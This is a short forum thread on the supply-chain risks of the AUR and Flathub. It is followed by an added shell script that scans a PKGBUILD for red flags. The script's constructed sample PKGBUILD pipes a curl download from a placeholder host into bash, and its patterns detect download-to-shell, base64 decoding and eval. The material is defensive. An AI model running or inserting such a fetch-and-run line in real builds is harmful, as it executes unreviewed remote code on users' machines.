It’s great having so much software available but the AUR makes me nervous because you really don’t know who you’re trusting when you install something from there.
Flathub has hundreds of apps which are not sandboxed and untrustworthy. So, no source is safe, and even most “safe” apps are not protected from supply chain attacks. So, you always have to be careful. But I agree there are certainly degrees of safety, and the AUR is certainly another one, which should not be taken lightly.
It’s great having so much software available but the AUR makes me nervous because you really don’t know who you’re trusting when you install something from there.
That’s why you are supposed to check the PKGBUILD before installing anything from the AUR.
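A first pass at the PKGBUILD check suggested above, added here as an example and not written by anyone in the thread: a static scan that flags lines worth reading closely. The function names, the rule list and the sample PKGBUILD are constructed for illustration; the file is only read with grep and never sourced, because sourcing a PKGBUILD executes it.

```shell
# check LABEL REGEX FILE: print "LABEL: lineno:text" for every matching line.
check() {
    grep -nE -- "$2" "$3" | sed "s/^/$1: /" || true   # no match is not an error
}

# audit_pkgbuild FILE: run every heuristic; prints nothing if none fire.
audit_pkgbuild() {
    # Source fetched over plain HTTP (https:// does not match this pattern).
    check plain-http-source 'http://' "$1"
    # Integrity check disabled for at least one source.
    check checksum-skipped '(^|[^[:alnum:]_])SKIP([^[:alnum:]_]|$)' "$1"
    # Something downloaded at build time and fed straight to a shell.
    check download-piped-to-shell \
        '(curl|wget)[^|]*\|[[:space:]]*(sudo[[:space:]]+)?(ba|z)?sh([[:space:];)]|$)' "$1"
    # An install scriptlet is declared; that file needs reading too.
    check install-scriptlet '^[[:space:]]*install=' "$1"
    # Encoded or dynamically evaluated commands.
    check obfuscation \
        'base64[[:space:]]+(-d|--decode)|(^|[^[:alnum:]_])eval[[:space:]]' "$1"
}

# Writes a constructed PKGBUILD (not a real package) to the given path.
write_sample_pkgbuild() {
    cat > "$1" <<'EOF'
# Constructed sample for this example, not a real package.
pkgname=example-tool
pkgver=1.0
source=("http://downloads.example.invalid/example-tool-$pkgver.tar.gz")
sha256sums=('SKIP')
install=example-tool.install
package() {
    curl -s https://example.invalid/setup.sh | bash
}
EOF
}

# Demo run on the constructed sample.
demo=$(mktemp)
write_sample_pkgbuild "$demo"
audit_pkgbuild "$demo"
rm -f "$demo"
```

An empty result only means none of these heuristics fired. `SKIP` is normal for VCS sources, and the upstream source and any `.install` file still have to be read by hand.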